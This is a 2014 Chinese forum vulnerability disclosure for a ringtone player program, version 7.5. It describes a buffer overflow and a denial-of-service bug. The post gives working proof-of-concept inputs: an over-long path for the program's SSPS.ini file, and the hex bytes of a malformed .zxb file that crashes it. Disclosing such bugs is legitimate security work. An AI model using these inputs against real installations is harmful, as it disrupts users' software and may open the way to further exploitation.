-
-
[原创]深蓝音乐铃声播放系统 7.5 内存破坏漏洞两枚(缓冲区溢出漏洞+拒绝服务漏洞)
-
2014-6-8 12:26
3025
-
[原创]深蓝音乐铃声播放系统 7.5 内存破坏漏洞两枚(缓冲区溢出漏洞+拒绝服务漏洞)
程序下载地址http://www.skycn.com/soft/appid/13261.html 该存在2枚内存破坏漏洞。
漏洞1:处理某地址时由于地址过长,造成缓冲区溢出漏洞。
漏洞2:处理zxb文件错误,存在拒绝服务漏洞。
漏洞内容:
该存在2枚内存破坏漏洞。
漏洞1:处理某地址时由于地址过长,造成缓冲区溢出漏洞。
漏洞2:处理zxb文件错误,存在拒绝服务漏洞。
漏洞1poc: 打开程序路径下的SSPS.ini文件。把作息表一项改成
作息表=c:\program files\ssps\作息表\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\poc.zxb
其他不变。运行程序既触发漏洞。。
漏洞2:
poc 把下面文件以16进制形式保存为poc.ZXB
5A5842370B000000B2CEBFBCD7F7CFA2B1ED0001FFFFFFFFFFFF
运行即崩溃
阿里云助力开发者!2核2G 3M带宽不限流量!6.18限时价,开
发者可享99元/年,续费同价!